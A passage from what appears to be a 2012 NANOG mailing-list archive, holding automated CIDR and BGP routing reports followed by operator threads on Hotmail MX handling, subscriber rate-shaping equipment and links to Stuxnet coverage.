241935 21-07-12 420802 243450 22-07-12 420851 242316 23-07-12 420929 242400 24-07-12 420469 242764 25-07-12 420742 242807 26-07-12 420845 241935 27-07-12 421258 243201 AS Summary 41751 Number of ASes in routing system 17450 Number of ASes announcing only one prefix 3412 Largest number of prefixes announced by an AS AS7029 : WINDSTREAM - Windstream Communications Inc 114212832 Largest address span announced by an AS (/32s) AS4134 : CHINANET-BACKBONE No.31,Jin-rong Street Aggregation Summary The algorithm used in this report proposes aggregation only when there is a precise match using the AS path, so as to preserve traffic transit policies. Aggregation is also proposed across non-advertised address space ('holes'). --- 27Jul12 --- ASnum NetsNow NetsAggr NetGain % Gain Description Table 421434 243342 178092 42.3% All ASes AS6389 3384 190 3194 94.4% BELLSOUTH-NET-BLK - BellSouth.net Inc. AS17974 2267 456 1811 79.9% TELKOMNET-AS2-AP PT Telekomunikasi Indonesia AS7029 3412 1737 1675 49.1% WINDSTREAM - Windstream Communications Inc AS18566 2088 417 1671 80.0% COVAD - Covad Communications Co. AS28573 2046 472 1574 76.9% NET Servicos de Comunicao S.A. AS4766 2762 1295 1467 53.1% KIXS-AS-KR Korea Telecom AS10620 2030 606 1424 70.1% Telmex Colombia S.A. AS4323 1577 387 1190 75.5% TWTC - tw telecom holdings, inc. AS22773 1698 569 1129 66.5% ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc. AS1785 1940 816 1124 57.9% AS-PAETEC-NET - PaeTec Communications, Inc. AS4755 1618 578 1040 64.3% TATACOMM-AS TATA Communications formerly VSNL is Leading ISP AS7303 1458 451 1007 69.1% Telecom Argentina S.A. AS7552 1128 225 903 80.1% VIETEL-AS-AP Vietel Corporation AS6458 881 45 836 94.9% Telgua AS8151 1473 666 807 54.8% Uninet S.A. de C.V. AS18101 942 157 785 83.3% RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI AS17908 828 60 768 92.8% TCISL Tata Communications AS4808 1118 351 767 68.6% CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network AS9394 908 166 742 81.7% CRNET CHINA RAILWAY Internet(CRNET) AS13977 839 123 716 85.3% CTELCO - FAIRPOINT COMMUNICATIONS, INC. AS855 694 52 642 92.5% CANET-ASN-4 - Bell Aliant Regional Communications, Inc. AS3356 1108 476 632 57.0% LEVEL3 Level 3 Communications AS17676 695 75 620 89.2% GIGAINFRA Softbank BB Corp. AS2118 632 14 618 97.8% RELCOM-AS OOO "NPO Relcom" AS22561 1035 424 611 59.0% DIGITAL-TELEPORT - Digital Teleport Inc. AS19262 1002 404 598 59.7% VZGNI-TRANSIT - Verizon Online LLC AS4780 834 243 591 70.9% SEEDNET Digital United Inc. AS24560 1037 449 588 56.7% AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services AS3549 1000 437 563 56.3% GBLX Global Crossing Ltd. AS4804 652 96 556 85.3% MPX-AS Microplex PTY LTD Total 43086 12437 30649 71.1% Top 30 total Possible Bogus Routes 5.10.8.0/21 AS57154 SWKN Stadtwerke Konstanz GmbH 5.158.96.0/19 AS38934 PRIDENET-AS Pride Limited 10.86.64.32/30 AS65530 -Private Use AS- 10.86.64.36/30 AS65530 -Private Use AS- 10.86.65.32/30 AS65530 -Private Use AS- 10.86.65.36/30 AS65530 -Private Use AS- 10.255.255.0/30 AS65530 -Private Use AS- 10.255.255.4/30 AS65530 -Private Use AS- 10.255.255.8/30 AS65530 -Private Use AS- 14.192.0.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.4.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.8.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.12.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.16.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.20.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.24.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.28.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 27.112.114.0/24 AS23884 PROENNET-AS Proimage Engineering and Communication Co.,Ltd. 41.0.0.0/8 AS37004 SUBURBAN-AS 41.222.80.0/21 AS37110 moztel-as 41.223.108.0/22 AS36966 EDL_AS Edgenet AS 62.61.220.0/24 AS24974 TACHYON-EU Tachyon Europe BV 62.61.221.0/24 AS24974 TACHYON-EU Tachyon Europe BV 64.66.32.0/20 AS18864 66.171.32.0/20 AS705 UUNET - MCI Communications Services, Inc. d/b/a Verizon Business 66.180.239.0/24 AS35888 VIGNETTE - VIGNETTE CORPORATION 66.207.32.0/20 AS23011 66.245.176.0/20 AS19318 NJIIX-AS-1 - NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC 66.251.128.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.133.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.134.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.136.0/21 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.140.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.141.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.142.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.143.0/24 AS3356 LEVEL3 Level 3 Communications 69.46.224.0/20 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.233.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.236.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 70.34.112.0/20 AS27589 MOJOHOST - MOJOHOST 71.19.134.0/23 AS3313 INET-AS BT Italia S.p.A. 72.35.224.0/22 AS30097 NUWAVE - NuWave 72.35.229.0/24 AS30188 TELEVERGENCE - Televergence Solutions Inc. 72.35.232.0/21 AS30097 NUWAVE - NuWave 72.44.16.0/20 AS15054 HAMELTRONICS - Hameltronics, LLC 74.91.48.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.49.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.50.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.51.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.52.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.53.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.54.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.55.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.56.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.57.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.58.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.59.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.60.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.61.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.62.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.63.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.112.96.0/22 AS2828 XO-AS15 - XO Communications 74.115.124.0/23 AS46540 74.115.126.0/24 AS11260 EASTLINK-HSI - EastLink 81.22.64.0/20 AS5511 OPENTRANSIT France Telecom S.A. 82.101.160.0/19 AS5511 OPENTRANSIT France Telecom S.A. 100.104.0.0/13 AS286 KPN KPN Internet Backbone 100.112.0.0/14 AS286 KPN KPN Internet Backbone 100.116.0.0/15 AS286 KPN KPN Internet Backbone 110.34.44.0/22 AS12653 COMTONET KB Impuls Hellas S.A. 116.206.72.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.85.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.103.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 117.120.56.0/21 AS4755 TATACOMM-AS TATA Communications formerly VSNL is Leading ISP 121.46.0.0/16 AS4134 CHINANET-BACKBONE No.31,Jin-rong Street 142.54.0.0/19 AS23498 CDSI - Cogeco Data Services LP 172.14.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.15.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.45.1.0/24 AS3356 LEVEL3 Level 3 Communications 172.102.0.0/22 AS4812 CHINANET-SH-AP China Telecom (Group) 172.116.0.0/24 AS7018 ATT-INTERNET4 - AT&T Services, Inc. 172.120.16.0/21 AS19891 BML-AS Bill Me Later, Inc 192.0.0.0/24 AS14745 INTERNAP-BLOCK-4 - Internap Network Services Corporation 195.35.108.0/23 AS8881 VERSATEL Versatel Deutschland GmbH 198.18.0.0/15 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 198.51.100.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 200.1.112.0/24 AS29754 GO2TEL GO2TEL.COM INC. 200.6.49.0/24 AS23148 TERREMARK Terremark 200.24.73.0/24 AS26061 Equant Colombia 200.53.0.0/19 AS13878 Diveo do Brasil Telecomunicacoes Ltda 200.58.248.0/21 AS27849 200.75.184.0/21 AS14754 Telgua 200.106.128.0/20 AS3257 TINET-BACKBONE Tinet SpA 200.115.112.0/20 AS3257 TINET-BACKBONE Tinet SpA 202.1.224.0/24 AS10097 FLOWCOM Flow Communications 2/541 Kent St Sydney NSW 2000 202.8.106.0/24 AS9530 SHINSEGAE-AS SHINSEGAE I&C Co., Ltd. 202.58.113.0/24 AS19161 202.83.120.0/21 AS37972 202.83.124.0/24 AS37972 202.83.125.0/24 AS37972 202.83.126.0/24 AS37972 202.94.1.0/24 AS4808 CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network 202.140.128.0/19 AS9583 SIFY-AS-IN Sify Limited 202.174.125.0/24 AS9498 BBIL-AP BHARTI Airtel Ltd. 202.176.1.0/24 AS9942 COMINDICO-AP SOUL Converged Communications Australia 202.179.134.0/24 AS23966 LDN-AS-PK LINKdotNET Telecom Limited 203.0.113.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 203.23.1.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.24.38.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.30.127.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/23 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.87.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.188.0/24 AS1221 ASN-TELSTRA Telstra Pty Ltd 203.142.219.0/24 AS45149 204.9.116.0/22 AS30097 NUWAVE - NuWave 204.10.88.0/21 AS3356 LEVEL3 Level 3 Communications 204.10.92.0/23 AS30097 NUWAVE - NuWave 204.10.94.0/23 AS30097 NUWAVE - NuWave 204.14.0.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.0.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.2.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.3.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 205.175.214.0/24 AS5583 ORANGE-BUSINESS-SERVICES-BENELUX France Telecom S.A. 206.197.184.0/24 AS23304 DATOTEL-STL-AS - Datotel LLC, a NetLabs LLC Company 207.174.131.0/24 AS26116 INDRA - Indra's Net Inc 207.174.132.0/23 AS26116 INDRA - Indra's Net Inc 207.174.152.0/23 AS26116 INDRA - Indra's Net Inc 207.174.154.0/24 AS26116 INDRA - Indra's Net Inc 207.174.155.0/24 AS26116 INDRA - Indra's Net Inc 207.174.200.0/24 AS22658 EARTHNET - Earthnet, Inc. 207.174.248.0/21 AS6653 PRIVATEI - privateI, LLC 207.231.96.0/19 AS11194 NUNETPA - NuNet Inc. 208.83.53.0/24 AS40569 YGOMI-AS - Ygomi LLC 208.93.144.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 208.93.151.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 209.148.64.0/19 AS13773 TELNETCOMM - Telnet Communications 209.177.64.0/20 AS6461 MFNX MFN - Metromedia Fiber Network 209.213.0.0/20 AS33005 ELTOPIA - Eltopia.com, LLC 213.150.202.0/24 AS8513 SKYVISION SkyVision Global Networks Ltd 213.150.204.0/24 AS29338 AFOL-AS Used by Africaonline Operations 216.12.160.0/20 AS26627 AS-PILOSOFT - Pilosoft, Inc. 216.21.160.0/20 AS27876 American Data Networks 216.146.0.0/19 AS11915 TELWEST-NETWORK-SVCS-STATIC - TEL WEST COMMUNICATIONS LLC 216.194.160.0/20 AS27876 American Data Networks Please see http://www.cidr-report.org for the full report ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From cidr-report at potaroo.net Thu Jul 26 19:40:13 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 27 Jul 2012 00:40:13 GMT Subject: BGP Update Report Message-ID: <201207270040.q6R0eDO6047533@wattle.apnic.net> BGP Update Report Interval: 21-Jul-12 -to- 25-Jul-12 (4 days) Observation Point: BGP Peering with AS131072 TOP 20 Unstable Origin AS Rank ASN Upds % Upds/Pfx AS-Name 1 - AS8402 31474 1.4% 17.8 -- CORBINA-AS OJSC "Vimpelcom" 2 - AS1637 30729 1.4% 284.5 -- DNIC-AS-01637 - Headquarters, USAISC 3 - AS17813 29341 1.3% 215.7 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 4 - AS47931 25100 1.1% 204.1 -- ALENETWORK A.L.E. COM NETWORK S.R.L 5 - AS9829 21569 0.9% 16.5 -- BSNL-NIB National Internet Backbone 6 - AS24560 19759 0.9% 19.1 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 7 - AS7029 15412 0.7% 4.4 -- WINDSTREAM - Windstream Communications Inc 8 - AS7552 13226 0.6% 11.7 -- VIETEL-AS-AP Vietel Corporation 9 - AS13118 11776 0.5% 245.3 -- ASN-YARTELECOM OJSC Rostelecom 10 - AS6458 11752 0.5% 13.3 -- Telgua 11 - AS27738 11509 0.5% 20.7 -- Ecuadortelecom S.A. 12 - AS48277 11271 0.5% 201.3 -- SOREX SOREX MEDIA S.R.L. 13 - AS49074 10768 0.5% 219.8 -- TECHNOLOGICAL SC TECHNOLOGICAL SRL 14 - AS6389 10345 0.5% 3.1 -- BELLSOUTH-NET-BLK - BellSouth.net Inc. 15 - AS28573 9562 0.4% 4.7 -- NET Servicos de Comunicao S.A. 16 - AS10620 9514 0.4% 4.7 -- Telmex Colombia S.A. 17 - AS5800 8667 0.4% 33.6 -- DNIC-ASBLK-05800-06055 - DoD Network Information Center 18 - AS4766 8347 0.4% 3.0 -- KIXS-AS-KR Korea Telecom 19 - AS8151 8307 0.4% 5.6 -- Uninet S.A. de C.V. 20 - AS43875 8261 0.4% 206.5 -- DATAINFO-ASN SC Data Media Info SRL TOP 20 Unstable Origin AS (Updates per announced prefix) Rank ASN Upds % Upds/Pfx AS-Name 1 - AS16535 3364 0.1% 1121.3 -- ECHOS-3 - Echostar Holding Purchasing Corporation 2 - AS44410 2654 0.1% 884.7 -- ENTEKHAB-AS ENTEKHAB INDUSTRIAL GROUP 3 - AS43348 1752 0.1% 876.0 -- TATARINOVA-AS PE Tatarinova Alla Ivanovna 4 - AS49072 837 0.0% 837.0 -- APSUARA-AS TCA Apsuara Ltd. 5 - AS54037 770 0.0% 770.0 -- CAREER-GROUP-INC - CAREER GROUP INC 6 - AS14452 6312 0.3% 701.3 -- IOS-ASN - INTERNET OF THE SANDHILLS 7 - AS26184 645 0.0% 645.0 -- ASA-HQAS - American Society of Anesthesiologists 8 - AS58655 1160 0.1% 580.0 -- SKYTEL6-BD SkyTel Communications Limited 9 - AS51250 552 0.0% 552.0 -- ITE-PROTON-AS "Information technologies enterprise "Proton" LTD 10 - AS3 440 0.0% 759.0 -- RESENNET-AS ResenNet Aps 11 - AS42806 411 0.0% 411.0 -- TELECOM-AS Telecom Georgia 12 - AS38857 775 0.0% 387.5 -- ESOFT-TRANSIT-AS-AP e.Soft Technologies Ltd. 13 - AS23007 888 0.0% 296.0 -- Universidad de Los Andes 14 - AS4 296 0.0% 51.0 -- COMUNICALO DE MEXICO S.A. DE C.V 15 - AS27890 576 0.0% 288.0 -- Universidad de Oriente 16 - AS1637 30729 1.4% 284.5 -- DNIC-AS-01637 - Headquarters, USAISC 17 - AS23237 1117 0.1% 279.2 -- MCMASTER - McMaster University 18 - AS29398 277 0.0% 277.0 -- PETROBALTIC "Petrobaltic" S.A. 19 - AS34744 5440 0.2% 247.3 -- GVM S.C. GVM SISTEM 2003 S.R.L. 20 - AS50704 1723 0.1% 246.1 -- BENEFIC-INTERNET Benefic Consult SRL TOP 20 Unstable Prefixes Rank Prefix Upds % Origin AS -- AS Name 1 - 109.161.64.0/19 11364 0.5% AS13118 -- ASN-YARTELECOM OJSC Rostelecom 2 - 59.176.0.0/14 6407 0.3% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 3 - 182.64.0.0/16 6060 0.3% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 4 - 122.161.0.0/16 6034 0.3% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 5 - 200.46.0.0/19 5790 0.2% AS21599 -- NETDIRECT S.A. 6 - 59.177.0.0/16 4822 0.2% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 7 - 202.56.215.0/24 3646 0.1% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 8 - 67.47.194.0/23 3358 0.1% AS16535 -- ECHOS-3 - Echostar Holding Purchasing Corporation 9 - 59.177.0.0/18 3349 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 10 - 123.252.208.0/24 3197 0.1% AS17762 -- HTIL-TTML-IN-AP Tata Teleservices Maharashtra Ltd 11 - 59.177.48.0/20 3103 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 12 - 139.139.19.0/24 3086 0.1% AS1562 -- DNIC-ASBLK-01550-01601 - DoD Network Information Center 13 - 194.63.9.0/24 2924 0.1% AS1273 -- CW Cable and Wireless Worldwide plc 14 - 65.82.30.0/24 2511 0.1% AS6197 -- BATI-ATL - BellSouth Network Solutions, Inc 15 - 69.38.178.0/24 2427 0.1% AS19406 -- TWRS-MA - Towerstream I, Inc. 16 - 115.170.128.0/17 1829 0.1% AS4847 -- CNIX-AP China Networks Inter-Exchange 17 - 59.177.0.0/19 1819 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 18 - 59.177.64.0/18 1695 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 19 - 59.177.144.0/20 1630 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 20 - 78.111.6.0/23 1575 0.1% AS44410 -- ENTEKHAB-AS ENTEKHAB INDUSTRIAL GROUP Details at http://bgpupdates.potaroo.net ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From marka at isc.org Thu Jul 26 20:34:10 2012 From: marka at isc.org (Mark Andrews) Date: Fri, 27 Jul 2012 11:34:10 +1000 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: Your message of "Thu, 26 Jul 2012 06:53:24 MST." References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> Message-ID: <20120727013411.A55B12311FA5@drugs.dv.isc.org> In message , Michael J Wise writ es: > > On Jul 26, 2012, at 1:35 AM, Lou Katz wrote: > > > The domain is cookephoto.com > > Why does mail.metron.com have MX records? Why do you care? There is nothing wrong with having explict MX records and they generally take up less room in a DNS cache then the negative response does especially if it is DNSSEC signed. > And they're different. Again why do you care? > $ host cookephoto.com > cookephoto.com has address 192.160.193.89 > cookephoto.com mail is handled by 10 mail.metron.com. > cookephoto.com mail is handled by 12 mail2.metron.com. > cookephoto.com mail is handled by 15 mail.katz.com. > > $ host mail.metron.com > mail.metron.com has address 192.160.193.14 > mail.metron.com mail is handled by 10 mail.metron.com. > mail.metron.com mail is handled by 20 mail.katz.com. > > $ host mail.katz.com > mail.katz.com has address 192.160.193.14 > > $ host mail2.metron.com > mail2.metron.com has address 209.204.189.91 > > $ host plaid.metron.com > plaid.metron.com has address 192.160.193.135 > > Normally, in my experience, the actual mail server doesn't have MX > records as such, but=85. > Just seems 0dd. All address record (A and AAAAA) have MX records. Some may be implicit but as far as SMTP is concerned they all have MX records. > Also, you say =85 > > > At the time of the transaction, nothing special was happening here, > ... > > Was anything strange happening with any of the DNS records for any of > these domains in the past two days? > > Aloha, > Michael. > -- > "Please have your Internet License > and Usenet Registration handy..." -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From mjwise at kapu.net Thu Jul 26 21:28:47 2012 From: mjwise at kapu.net (Michael J Wise) Date: Thu, 26 Jul 2012 19:28:47 -0700 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120727013411.A55B12311FA5@drugs.dv.isc.org> References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> Message-ID: On Jul 26, 2012, at 6:34 PM, Mark Andrews wrote: > In message , Michael J Wise writ > es: >> >> On Jul 26, 2012, at 1:35 AM, Lou Katz wrote: >> >>> The domain is cookephoto.com >> >> Why does mail.metron.com have MX records? > > Why do you care? There is nothing wrong with having explict MX > records and they generally take up less room in a DNS cache then > the negative response does especially if it is DNSSEC signed. > >> And they're different. > > Again why do you care? Why do *I* care? I don't. I'm just trying to find the weird bit that maybe is causing hotmail to stumble. And maybe an endless loop for an MX lookup might be what is causing hotmail to panic and throw out the MX records. >> $ host cookephoto.com >> cookephoto.com has address 192.160.193.89 >> cookephoto.com mail is handled by 10 mail.metron.com. >> cookephoto.com mail is handled by 12 mail2.metron.com. >> cookephoto.com mail is handled by 15 mail.katz.com. >> >> $ host mail.metron.com >> mail.metron.com has address 192.160.193.14 >> mail.metron.com mail is handled by 10 mail.metron.com. >> mail.metron.com mail is handled by 20 mail.katz.com. >> >> $ host mail.katz.com >> mail.katz.com has address 192.160.193.14 >> >> $ host mail2.metron.com >> mail2.metron.com has address 209.204.189.91 >> >> $ host plaid.metron.com >> plaid.metron.com has address 192.160.193.135 >> >> Normally, in my experience, the actual mail server doesn't have MX >> records as such, but=85. >> Just seems 0dd. > > All address record (A and AAAAA) have MX records. Some may be > implicit but as far as SMTP is concerned they all have MX records. > >> Also, you say =85 >> >>> At the time of the transaction, nothing special was happening here, >> ... >> >> Was anything strange happening with any of the DNS records for any of >> these domains in the past two days? >> >> Aloha, >> Michael. >> -- >> "Please have your Internet License >> and Usenet Registration handy..." > -- > Mark Andrews, ISC > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org Aloha, Michael. -- "Please have your Internet License and Usenet Registration handy..." From marka at isc.org Thu Jul 26 21:45:37 2012 From: marka at isc.org (Mark Andrews) Date: Fri, 27 Jul 2012 12:45:37 +1000 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: Your message of "Thu, 26 Jul 2012 19:28:47 MST." References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> Message-ID: <20120727024538.46BAF23125D1@drugs.dv.isc.org> In message , Michael J Wise writ es: > > On Jul 26, 2012, at 6:34 PM, Mark Andrews wrote: > > > In message , Michael J = > Wise writ > > es: > >>=20 > >> On Jul 26, 2012, at 1:35 AM, Lou Katz wrote: > >>=20 > >>> The domain is cookephoto.com > >>=20 > >> Why does mail.metron.com have MX records? > >=20 > > Why do you care? There is nothing wrong with having explict MX > > records and they generally take up less room in a DNS cache then > > the negative response does especially if it is DNSSEC signed. > >=20 > >> And they're different. > >=20 > > Again why do you care? > > Why do *I* care? > I don't. > > I'm just trying to find the weird bit that maybe is causing hotmail to = > stumble. > And maybe an endless loop for an MX lookup might be what is causing = > hotmail to panic and throw out the MX records. You don't lookup MX records for MX targets. This is basic MTA processing. If the MX lookup fails, as apposed to returns nodata, you don't lookup the A/AAAA records and synthesis a MX record. You treat it as a soft error and queue for retry later. Again this is basic MTA processing. You don't depend on ALL (ANY) returning MX records as they may not be in the cache. You need to make a explict MX query you get no MX records are returned in response to a ALL query. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From erikm at buh.org Thu Jul 26 22:21:21 2012 From: erikm at buh.org (Erik Muller) Date: Thu, 26 Jul 2012 20:21:21 -0700 Subject: Rate shaping in Active E FTTx networks In-Reply-To: References: Message-ID: <50120931.4050408@buh.org> On 7/26/12 12:45 , Jason Lixfeld wrote: > Hi all, > > I'm trying to gauge what operators are doing to handle per-subscriber > Internet access PIR bandwidth in Active E FTTx networks. > > I presume operators would want to limit the each subscriber to a > certain PIR, but within that limit, do things like perform preferential > treatment of interactive services like steaming video or Skype, etc., > ahead of non-interactive services like FTP. > > My impression is that a subscriber's physical access in these networks > is exponentially larger than their allocated amount of Internet access. > This would leave ample room on the physical access access for other > services like Voice and IPTV that might run on separate VLANs than the > Internet access VLAN. That said, I doubt there's really that much of a > concern about allocating PIR on these other service VLANs. > > So in terms of PIR for Internet access, is there some magic box that > sits between the various subscriber aggregation points and the core, > which takes care of shaping the subscriber's Internet access PIR, while > making sure that the any preferential treatment of interactive services > is performed. > > Is that a lot to ask for one box? The ridiculously deep buffers > required in order to shape to PIR vs. police to it (because policing to > a PIR is just plain ugly) and the requirements to perform any sort of > preferential packet treatment above and beyond that seem like quite a > lot to ask of one box. Am I wrong? > > Who might make a box like this, if it exists? And if not, what are > folks using the achieve these results? > > Thanks in advance for any insights.. I've seen a few deployments using Packeteer's (now BlueCoat) PacketShaper for this purpose; the only downside I've heard with that platform is cost. Sandvine and Fortinet are a couple other options that have different approaches, but have a lot of this functionality rolled in alongside their broader security services. -e From MGauvin at dryden.ca Thu Jul 26 22:48:00 2012 From: MGauvin at dryden.ca (Mark Gauvin) Date: Thu, 26 Jul 2012 22:48:00 -0500 Subject: Rate shaping in Active E FTTx networks In-Reply-To: <50120931.4050408@buh.org> References: , <50120931.4050408@buh.org> Message-ID: <4DEA063ACE629740877D59B74D6FB264240873EBBA@exchange.citydryden.local> Juniper dynamic application awareness does a decent job and so does the cisco counterpart saves buying more hw ________________________________________ From: Erik Muller [erikm at buh.org] Sent: Thursday, July 26, 2012 10:21 PM To: nanog at nanog.org Subject: Re: Rate shaping in Active E FTTx networks On 7/26/12 12:45 , Jason Lixfeld wrote: > Hi all, > > I'm trying to gauge what operators are doing to handle per-subscriber > Internet access PIR bandwidth in Active E FTTx networks. > > I presume operators would want to limit the each subscriber to a > certain PIR, but within that limit, do things like perform preferential > treatment of interactive services like steaming video or Skype, etc., > ahead of non-interactive services like FTP. > > My impression is that a subscriber's physical access in these networks > is exponentially larger than their allocated amount of Internet access. > This would leave ample room on the physical access access for other > services like Voice and IPTV that might run on separate VLANs than the > Internet access VLAN. That said, I doubt there's really that much of a > concern about allocating PIR on these other service VLANs. > > So in terms of PIR for Internet access, is there some magic box that > sits between the various subscriber aggregation points and the core, > which takes care of shaping the subscriber's Internet access PIR, while > making sure that the any preferential treatment of interactive services > is performed. > > Is that a lot to ask for one box? The ridiculously deep buffers > required in order to shape to PIR vs. police to it (because policing to > a PIR is just plain ugly) and the requirements to perform any sort of > preferential packet treatment above and beyond that seem like quite a > lot to ask of one box. Am I wrong? > > Who might make a box like this, if it exists? And if not, what are > folks using the achieve these results? > > Thanks in advance for any insights.. I've seen a few deployments using Packeteer's (now BlueCoat) PacketShaper for this purpose; the only downside I've heard with that platform is cost. Sandvine and Fortinet are a couple other options that have different approaches, but have a lot of this functionality rolled in alongside their broader security services. -e From rgolodner at infratection.com Thu Jul 26 23:08:12 2012 From: rgolodner at infratection.com (Richard Golodner) Date: Thu, 26 Jul 2012 23:08:12 -0500 Subject: Stuxnet and more Message-ID: <000601cd6bad$7130cbf0$539263d0$@infratection.com> Grant said today: -----Original Message----- From: Grant Ridder [mailto:shortdudey123 at gmail.com] Sent: Thursday, July 26, 2012 11:25 AM To: nanog at nanog.org Subject: Stuxnet Hi Everyone, I realize most people already know the history of Stuxnet but i figured i would pass along an IEEE article that was just published. http://spectrum.ieee.org/computing/networks/declarations-of-cyberwar -Grant Grant and the rest of you NANOGERS, more regarding new problems in Iran via an F-Secure blog. Here is the link: http://www.f-secure.com/weblog/archives/00002403.html Sincerely, Richard Golodner P.S. Did I ever mention how much I hate M$ Windows? From scott at doc.net.au Fri Jul 27 02:04:40 2012 From: scott at doc.net.au (Scott Howard) Date: Fri, 27 Jul 2012 00:04:40 -0700 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120727024538.46BAF23125D1@drugs.dv.isc.org> References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> 